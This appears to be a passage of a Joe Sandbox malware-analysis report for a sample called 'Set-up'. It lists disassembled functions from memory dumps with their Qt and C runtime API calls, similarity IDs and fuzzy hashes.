?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000,00000000,6C1A777E,000000FF,6C0EDD74), ref: 6C0EDBFC
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0EDC13
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0EDC2A

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$?ref@AtomicBasicInt@@$Point@@
String ID:
API String ID: 2135668615-0
Opcode ID: 1b4cb06ba9a1a30636d541751ee7a5064e77c6f722f8e511441900534fbc04bb
Instruction ID: e9f6131ccb4353ea0901329d3188c06a5595106b5749ca49631c462981129bd0
Opcode Fuzzy Hash: 1b4cb06ba9a1a30636d541751ee7a5064e77c6f722f8e511441900534fbc04bb
Instruction Fuzzy Hash: BE213474600B52CFDB28CF69D458A5ABBF8FF56704F00891EE09283B60DB70A645CF91

Function 6C0BDFA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

??7QBasicAtomicInt@@QBE_NXZ.QTCORE4(?,6C0C94C7,?), ref: 6C0BDFA6
?registerType@QMetaType@@SAHPBDP6AXPAX@ZP6APAXPBX@Z@Z.QTCORE4(QGraphicsItem *,6BC5D940,6C0B6F50,?,6C0C94C7,?), ref: 6C0BDFBF
??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000000,?,00000005,00000000,?), ref: 6C0BDFCE
?x@QPoint@@QBEHXZ.QTCORE4(6C566FC0,?,?,6C0C94C7,?), ref: 6C0BDFDB
?userType@QVariant@@QBEHXZ.QTCORE4(?,?,6C0C94C7,?), ref: 6C0BDFE9
?constData@QVariant@@QBEPBXXZ.QTCORE4(?,?,6C0C94C7,?), ref: 6C0BDFF5

Strings

QGraphicsItem *, xrefs: 6C0BDFBA

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Type@Variant@@$?const?register?userAtomicBasicData@Int@@Latin1MetaPoint@@String@@Type@@
String ID: QGraphicsItem *
API String ID: 4277226507-3294718815
Opcode ID: 2512be497e1b118e04044a3a9297664237d1bbc42648a10bae51756f8b861192
Instruction ID: af69d85fc99aade146cff70f1e2da77afe7d2cfed27a91d0ed4f4124c2679103
Opcode Fuzzy Hash: 2512be497e1b118e04044a3a9297664237d1bbc42648a10bae51756f8b861192
Instruction Fuzzy Hash: 73012D363002009FCA04EED8F448A9D77F6EFC6365F100869F616D7640DB329D169BE2

Function 6BC9FFF0 Relevance: 10.6, APIs: 7, Instructions: 76COMMON

Download Yara Rule

APIs

?size@QListData@@QBEHXZ.QTCORE4(?,?,?,6BC6B88A,B6508C7A,B6508C7A,?,00000000,?,6BC6E037,?), ref: 6BC9FFF5
?at@QListData@@QBEPAPAXH@Z.QTCORE4(000000FF), ref: 6BCA0003
?end@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BCA000D
?begin@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BCA0035
??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001), ref: 6BCA0053
?at@QListData@@QBEPAPAXH@Z.QTCORE4(-00000004), ref: 6BCA006D
?end@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BCA0077

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?at@?end@$?begin@?size@AtomicBasicInt@@
String ID:
API String ID: 2500848115-0
Opcode ID: 53f3798d01e3c697e02b4695483463692aaeb82d8ef029be36f8c36bfb84fc58
Instruction ID: 7a69916636721176edf5265e6a657efffd327e7e408c29f1dc48d3c5874b7e71
Opcode Fuzzy Hash: 53f3798d01e3c697e02b4695483463692aaeb82d8ef029be36f8c36bfb84fc58
Instruction Fuzzy Hash: 64112733B011128FDF149AB8D4A856EB366EF813F1705427AD916E7380EB359D10CBD1

Function 6BFBBAE0 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

?y@QRect@@QBEHXZ.QTCORE4(?,?), ref: 6BFBBB00
?x@QPoint@@QBEHXZ.QTCORE4(?,?), ref: 6BFBBB1E
?size@QRect@@QBE?AVQSize@@XZ.QTCORE4(?,?,?), ref: 6BFBBB3A
??0QPoint@@QAE@HH@Z.QTCORE4(?,?,?,?), ref: 6BFBBB62
??0QPoint@@QAE@HH@Z.QTCORE4(?,?,?,?), ref: 6BFBBB7D
?unicode@QChar@@QAEAAGXZ.QTCORE4(?,?), ref: 6BFBBB92
?rheight@QSize@@QAEAAHXZ.QTCORE4(?,?), ref: 6BFBBBA4

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point@@$Rect@@Size@@$?rheight@?size@?unicode@Char@@
String ID:
API String ID: 1801271528-0
Opcode ID: 5240b77cc6fb2b4e70143625a80ee5f97eb860f47f5e1be75ec8513863314a7c
Instruction ID: 7f8d49694c355e77ec5d0da5e4840fb97aabe793eca3531b42d5fe1c8b54b8a4
Opcode Fuzzy Hash: 5240b77cc6fb2b4e70143625a80ee5f97eb860f47f5e1be75ec8513863314a7c
Instruction Fuzzy Hash: FA21277A204700CFC709DFA8D9989ABB7F6FFC9301F04895DE94687315DA34A914CBA1

Function 6BD0B0B0 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000068,B6508C7A,00000120,00000120,?,6C159943,000000FF,6BD0D15D,B6508C7A,00000000,00000120,00000000,6C159C98,000000FF,6C0BD7E6,B6508C7A), ref: 6BD0B0ED
??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000000,?,?,?,?,?,?,?,00000000), ref: 6BD0B10B
?invalidate@QColor@@AAEXXZ.QTGUI4(?,?,?,?,?,?,?,00000000), ref: 6BD0B114
??0QTransform@@QAE@XZ.QTGUI4(?,?,?,?,?,?,?,00000000), ref: 6BD0B11C
??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000001,?,?,?,?,?,?,?,00000000), ref: 6BD0B135
??4QColor@@QAEAAV0@W4GlobalColor@Qt@@@Z.QTGUI4(00000002,?,?,?,?,?,?,?,00000000), ref: 6BD0B147
??3@YAXPAX@Z.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,00000000), ref: 6BD0B183

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Color@@Latin1String@@$??2@??3@?invalidate@Color@GlobalQt@@@Transform@@
String ID:
API String ID: 3389083479-0
Opcode ID: 0a0b3efc9f6682916e5b0b44bf0fc2d3738d4d7a991eac5906c212f619470870
Instruction ID: e9468c3a9e2ba0853eee1f663be8606729aba9c353fb8b862c08718b64012238
Opcode Fuzzy Hash: 0a0b3efc9f6682916e5b0b44bf0fc2d3738d4d7a991eac5906c212f619470870
Instruction Fuzzy Hash: B921D171A1C7109BE715CF24C855B5B7BF8FB45B24F00492EE81A8B680EB79A644CBC3

Function 6C0F14A0 Relevance: 10.6, APIs: 7, Instructions: 58timeCOMMON

Download Yara Rule

APIs

?height@QRect@@QBEHXZ.QTCORE4 ref: 6C0F14D2
?width@QRect@@QBEHXZ.QTCORE4 ref: 6C0F14E6
?x@QPoint@@QBEHXZ.QTCORE4 ref: 6C0F14F4
?right@QRect@@QBEHXZ.QTCORE4 ref: 6C0F1504
?y@QRect@@QBEHXZ.QTCORE4 ref: 6C0F1514
?timerId@QTimerEvent@@QBEHXZ.QTCORE4 ref: 6C0F1524
?update@QWidget@@QAEXXZ.QTGUI4 ref: 6C0F15BD

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Rect@@$?height@?right@?timer?update@?width@Event@@Point@@TimerWidget@@
String ID:
API String ID: 3101963814-0
Opcode ID: 77abad0aa06a10e14c49afc116cb2ae1314b36d23ea80a892f67c0620c877817
Instruction ID: eb39d5406fa0046c488a31f22bb716096cd4e215ff1a5d0619f5b4bd5b4cbce9
Opcode Fuzzy Hash: 77abad0aa06a10e14c49afc116cb2ae1314b36d23ea80a892f67c0620c877817
Instruction Fuzzy Hash: E61101703002409BEF169E94D49879E73E5EF4A711F0C0439EC11CB205CB31D892EBA5

Function 6C0F2440 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

??0QPointF@@QAE@ABVQPoint@@@Z.QTCORE4(?,?), ref: 6C0F2451
?unicode@QChar@@QAEAAGXZ.QTCORE4 ref: 6C0F245B
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F246E

Part of subcall function 6C0F0D30: ?layoutDirection@QWidget@@QBE?AW4LayoutDirection@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D51
Part of subcall function 6C0F0D30: ?wizard@QWizardPage@@IBEPAVQWizard@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D72
Part of subcall function 6C0F0D30: ?orientation@QSplitterHandle@@QBE?AW4Orientation@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D8A
Part of subcall function 6C0F0D30: ?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DA2
Part of subcall function 6C0F0D30: ?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DD4

?ry@QPointF@@QAEAANXZ.QTCORE4 ref: 6C0F2481
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F2494
?inverted@QTransform@@QBE?AV1@PA_N@Z.QTGUI4(?,00000000,?,?), ref: 6C0F24C9
?map@QTransform@@QBE?AVQPointF@@ABV2@@Z.QTGUI4(?,00000000,?,?), ref: 6C0F24D0

Part of subcall function 6BD7FC10: ?x@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC22
Part of subcall function 6BD7FC10: ?y@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC2E

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$?update?value@AbstractDirection@GraphicsPrivate@@Qt@@Scroll@Slider@@Transform@@View$?inverted@?layout?map@?orientation@?ry@?unicode@?wizard@Char@@Handle@@LayoutOrientation@Page@@Point@@@SplitterV2@@Widget@@WizardWizard@@
String ID:
API String ID: 374605599-0
Opcode ID: d7bf6856cb296c69a25618795f35e14f4a2ece25409242d702ff24e21a704b37
Instruction ID: f533fb02cd9d75114c80a37b373266e113cf5cc1bcba87d74b01f86995541a6f
Opcode Fuzzy Hash: d7bf6856cb296c69a25618795f35e14f4a2ece25409242d702ff24e21a704b37
Instruction Fuzzy Hash: 942181752046419FD304DF24D098B9BBBE0FF89308F24C85DE8AA472A0DB75A95ACB91

Function 6BF133C0 Relevance: 10.5, APIs: 7, Instructions: 41windowCOMMON

Download Yara Rule

APIs

?style@QWidget@@QBEPAVQStyle@@XZ.QTGUI4(?,00000000,?,6BF13645,?,?,00000000,B6508C7A,00000000,?,?,?), ref: 6BF133CA
?setFocusPolicy@QWidget@@QAEXW4FocusPolicy@Qt@@@Z.QTGUI4(00000000,?,?,?), ref: 6BF133E3
?setControlType@QSizePolicy@@QAEXW4ControlType@1@@Z.QTGUI4(?,00000000,?,?,?), ref: 6BF133FB
?setSizePolicy@QWidget@@QAEXVQSizePolicy@@@Z.QTGUI4(6C1D7F68,?,00000000,?,?,?), ref: 6BF13407
?setAttribute@QWidget@@QAEXW4WidgetAttribute@Qt@@_N@Z.QTGUI4(00000044,00000000,6C1D7F68,?,00000000,?,?,?), ref: 6BF13412
?setForegroundRole@QWidget@@QAEXW4ColorRole@QPalette@@@Z.QTGUI4(00000008,00000044,00000000,6C1D7F68,?,00000000,?,?,?), ref: 6BF1341B

Part of subcall function 6BC6E1E0: ?updateSystemBackground@QWidgetPrivate@@QAEXXZ.QTGUI4(?,6BF13420,00000008,00000044,00000000,6C1D7F68,?,00000000,?,?,?), ref: 6BC6E1F0
Part of subcall function 6BC6E1E0: ?propagatePaletteChange@QWidgetPrivate@@QAEXXZ.QTGUI4(?,6BF13420,00000008,00000044,00000000,6C1D7F68,?,00000000,?,?,?), ref: 6BC6E1F7

?setBackgroundRole@QWidget@@QAEXW4ColorRole@QPalette@@@Z.QTGUI4(00000001,00000008,00000044,00000000,6C1D7F68,?,00000000,?,?,?), ref: 6BF13424

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?setWidget@@$Role@$Policy@SizeWidget$Attribute@ColorControlFocusPalette@@@Private@@$?propagate?style@?updateBackgroundBackground@Change@ForegroundPalettePolicy@@Policy@@@Qt@@@Qt@@_Style@@SystemType@Type@1@@
String ID:
API String ID: 886288872-0
Opcode ID: 87cb4ce86bf176fc10f7ce6e265467054d3d84aac3000f5bc61ebc280e0ed3fd
Instruction ID: f99b4d9f03961428c6e86bf1f4773d06c6e7a4114358f153eaa4392441979f6f
Opcode Fuzzy Hash: 87cb4ce86bf176fc10f7ce6e265467054d3d84aac3000f5bc61ebc280e0ed3fd
Instruction Fuzzy Hash: 0DF062713505107BD609A7748C52F6EA3959FC8B54F10401DF2169F3C0EFB96E0187D9

Function 6C0BE040 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

??7QBasicAtomicInt@@QBE_NXZ.QTCORE4(?,6C0BF4F9,B6508C7A,B6508C7A,?,?,6C0C948D,?,?), ref: 6C0BE04D
?registerType@QMetaType@@SAHPBDP6AXPAX@ZP6APAXPBX@Z@Z.QTCORE4(QGraphicsItem *,6BC5D940,6C0B6F50,?,?,6C0C948D,?,?), ref: 6C0BE066
??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000000), ref: 6C0BE075
?x@QPoint@@QBEHXZ.QTCORE4(B6508C7A,?,?,6C0C948D,?,?), ref: 6C0BE081
??0QVariant@@QAE@HPBXI@Z.QTCORE4(00000000,?,00000001,?,?,6C0C948D,?,?), ref: 6C0BE095

Strings

QGraphicsItem *, xrefs: 6C0BE061

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?registerAtomicBasicInt@@Latin1MetaPoint@@String@@Type@Type@@Variant@@
String ID: QGraphicsItem *
API String ID: 2417067058-3294718815
Opcode ID: 0aa1a4c5d99c11f181fc844ea2e8cedaa8cfeb850967e11dfd52bea213365b33
Instruction ID: dca64cfb230f9d8cf59a76485c2b43a38f3f7723ffa790a1a70c509b1e7490d1
Opcode Fuzzy Hash: 0aa1a4c5d99c11f181fc844ea2e8cedaa8cfeb850967e11dfd52bea213365b33
Instruction Fuzzy Hash: ACF0E5B5314210ABCA0C6FD4A858B1E77A9AF46206F00081CF50BE7680CA325E218FF7

Function 6C0F40B0 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4(?), ref: 6C0F40CD

Part of subcall function 6C0F0D30: ?layoutDirection@QWidget@@QBE?AW4LayoutDirection@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D51
Part of subcall function 6C0F0D30: ?wizard@QWizardPage@@IBEPAVQWizard@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D72
Part of subcall function 6C0F0D30: ?orientation@QSplitterHandle@@QBE?AW4Orientation@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D8A
Part of subcall function 6C0F0D30: ?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DA2
Part of subcall function 6C0F0D30: ?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DD4

?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4(?), ref: 6C0F40E9
?fromTranslate@QTransform@@SA?AV1@NN@Z.QTGUI4(?,?,?), ref: 6C0F4132
??4QMatrix@@QAEAAV0@ABV0@@Z.QTGUI4(?), ref: 6C0F414F
??DQTransform@@QBE?AV0@ABV0@@Z.QTGUI4(?,?), ref: 6C0F41BF
??4QMatrix@@QAEAAV0@ABV0@@Z.QTGUI4(00000000,?,?), ref: 6C0F41CC

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: V0@@$?update?value@AbstractDirection@GraphicsMatrix@@Private@@Qt@@Scroll@Slider@@Transform@@View$?from?layout?orientation@?wizard@Handle@@LayoutOrientation@Page@@SplitterTranslate@Widget@@WizardWizard@@
String ID:
API String ID: 1991755678-0
Opcode ID: 3724892955b6f3fc3d1c0037a867078540599130e471e439f066744504122ec5
Instruction ID: 869266caf44ce83910262a0009f14504fad0a9c117c101ed87662e0323b4513b
Opcode Fuzzy Hash: 3724892955b6f3fc3d1c0037a867078540599130e471e439f066744504122ec5
Instruction Fuzzy Hash: 32418B30208B948BC324DB69D4857ABFBF4FF88308F40895DD9DA83680DB35B564CB92

Function 6BCD1B80 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000070,B6508C7A,?,00000000), ref: 6BCD1BBD
??0QObjectPrivate@@QAE@H@Z.QTCORE4(00040805), ref: 6BCD1BDE
?invalidate@QColor@@AAEXXZ.QTGUI4 ref: 6BCD1BF2
??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(00000000,?), ref: 6BCD1C07
?setRgb@QColor@@QAEXHHHH@Z.QTGUI4(00000000,00000000,000000C0,000000FF), ref: 6BCD1C3A
??4QColor@@QAEAAV0@ABV0@@Z.QTGUI4(?,00000000,00000000,000000C0,000000FF), ref: 6BCD1C47

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Color@@$ObjectPrivate@@V0@@$??2@?invalidate@?setObject@@Rgb@
String ID:
API String ID: 3592331405-0
Opcode ID: 9fd0d3a2dbdda6dc96529baadb6a2a2f7d1e6832cc85c5f229c5a8f2e9562c7c
Instruction ID: 95fdac2e2601c74b035a232c0c8979f409e1129d42612b78e0b39fdb7bef51f6
Opcode Fuzzy Hash: 9fd0d3a2dbdda6dc96529baadb6a2a2f7d1e6832cc85c5f229c5a8f2e9562c7c
Instruction Fuzzy Hash: D4218DB5614701AFD314CF29C846B5ABBE4FF85B24F000A1EF561877D0EBB5A614CB92

Function 6BC1CB80 Relevance: 9.1, APIs: 6, Instructions: 63COMMON

Download Yara Rule

APIs

?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,00000000,?,?,?,?,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1CBB0
?detach@QListData@@QAEPAUData@1@H@Z.QTCORE4(?,?,?,?,00000002,B6508C7A,00000000,?,B6508C7A), ref: 6BC1CBBF
?end@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BC1CBD3
?begin@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BC1CBDD

Part of subcall function 6BC18910: ??2@YAPAXI@Z.MSVCR100(00000018,B6508C7A,00000000,?,00000000,00000000), ref: 6BC18952
Part of subcall function 6BC18910: ??0QVariant@@QAE@ABV0@@Z.QTCORE4(-00000008,?,00000000,00000000), ref: 6BC18974

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,00000000,?), ref: 6BC1CBF9

Part of subcall function 6BC188D0: ??1QVariant@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6BC1CC1A,00000014,00000014), ref: 6BC188F3
Part of subcall function 6BC188D0: ??3@YAXPAX@Z.MSVCR100(?,?,00000000,00000000,6BC1CC1A,00000014,00000014), ref: 6BC188F6

?qFree@@YAXPAX@Z.QTCORE4(00000000,00000014,00000014), ref: 6BC1CC1B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@Variant@@$??2@??3@?deref@?detach@?end@AtomicBasicData@1@Free@@Int@@V0@@
String ID:
API String ID: 2912339066-0
Opcode ID: 314f7208109a7109931970ff7fac991cffcbd0d12b04efc6aade673b839bdec2
Instruction ID: c240540f4514e8a0565e296318a1ea893059038ecb7d533c3636178a8f6e8fe4
Opcode Fuzzy Hash: 314f7208109a7109931970ff7fac991cffcbd0d12b04efc6aade673b839bdec2
Instruction Fuzzy Hash: B3117271B04509AFCB04DF98D558A6EBBBCFF49624F00461AE416D3380DB346A119BE2

Function 6C0F7D40 Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

?items@QGraphicsView@@QBE?AV?$QList@PAVQGraphicsItem@@@@ABVQPoint@@@Z.QTGUI4(?,00000000,B6508C7A,?,00000000,6C185068,000000FF,6BC138A2,00000000), ref: 6C0F7D8F
?isEmpty@QListData@@QBE_NXZ.QTCORE4(?,00000000,B6508C7A,?,00000000,6C185068,000000FF,6BC138A2,00000000), ref: 6C0F7D9C
??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001,?,00000000,6C185068,000000FF,6BC138A2,00000000), ref: 6C0F7DAC
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,00000000,6C185068,000000FF,6BC138A2,00000000), ref: 6C0F7DCB
